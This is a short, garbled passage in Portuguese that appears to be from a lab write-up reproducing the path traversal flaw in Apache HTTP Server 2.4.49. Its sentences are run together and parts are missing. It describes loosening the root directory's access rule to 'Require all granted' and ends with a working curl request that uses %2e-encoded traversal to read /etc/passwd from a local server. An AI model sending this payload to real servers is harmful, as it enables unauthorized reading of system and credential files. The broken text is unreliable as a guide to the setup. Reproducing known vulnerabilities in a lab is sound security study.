
Reprodução da Vulnerabilidade de Path Traversal no Apache HTTP Server 2.4.49
ap_normalize_path. Atacantes podem contornar controles de acesso construindo requisições especiais contendo codificação %2e, permitindo a leitura de arquivos arbitrários no servidor web.Require all denied para Require all granted no bloco <Directory />/vuln apontando para /tmp/vuln_dir e configurar permissõescurl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
